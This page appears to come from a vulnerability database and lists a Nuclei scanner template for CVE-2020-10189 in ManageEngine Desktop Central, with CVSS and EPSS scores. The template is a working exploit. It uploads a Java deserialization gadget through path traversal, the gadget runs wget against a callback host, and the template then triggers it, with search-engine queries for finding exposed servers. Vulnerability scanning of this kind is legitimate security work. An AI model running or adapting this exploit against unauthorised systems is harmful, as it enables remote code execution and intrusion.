Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-10189
HistoryApr 16, 2024 - 7:15 p.m.

ManageEngine Desktop Central Java Deserialization

2024-04-1619:15:38
ProjectDiscovery
github.com
41
cve
cve-2020-10189
king-alexander
zoho
manageengine
untrusted data
remote code execution
updates
java deserialization
exploitation
cvss
3.1
av:n
ac:l
pr:n
ui:n
s:u
c:h
i:h
a:h
cwe-502
rce
interactsh_protocol
dns
common-collections3.1
wget
interaction.

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.6

Confidence

Low

EPSS

0.973

Percentile

99.9%

Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.
id: CVE-2020-10189

info:
  name: ManageEngine Desktop Central Java Deserialization
  author: king-alexander
  severity: critical
  description: |
    Zoho ManageEngine Desktop Central before 10.0.474 is vulnerable to a deserialization of untrusted data, which permits remote code execution.
  remediation: |
    Apply updates per vendor instructions.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10189
    - https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189
    - https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html
    - https://y4er.com/posts/cve-2020-10189-zoho-manageengine-rce/
    - https://cwe.mitre.org/data/definitions/502.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10189
    cwe-id: CWE-502
    epss-score: 0.97206
    epss-percentile: 0.99826
    cpe: cpe:2.3:a:zohocorp:manageengine_desktop_central:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zohocorp
    product: manageengine_desktop_central
    fofa-query:
      - body="manageengine desktop central 10"
      - title="manageengine desktop central 10"
      - app="zoho-manageengine-desktop"
    shodan-query: http.title:"manageengine desktop central 10"
    google-query: intitle:"manageengine desktop central 10"
  tags: cve,cve2020,kev,zoho,manageengine,deserialization,intrusive

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /mdm/client/v1/mdmLogUploader?udid=si%5C..%5C..%5C..%5Cwebapps%5CDesktopCentral%5C_chart&filename=logger.zip HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/octet-stream

        {{generate_java_gadget("commons-collections3.1","wget http://{{interactsh-url}}","raw")}}

    matchers:
      - type: status
        status:
          - 200
        internal: true

  - raw:
      - |
        GET /cewolf/?img=%5Clogger.zip HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100cb3c5b5b1829fc6911828be549f9cd971bec2e2f049b2938748393bb96e164e5022100fed5121eb3d3902d8e4feaee8e6899dc596ae7ecd1bbb92aa9e516371ee59900:922c64590222798bb761d5b6d8e72950

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

7.6

Confidence

Low

EPSS

0.973

Percentile

99.9%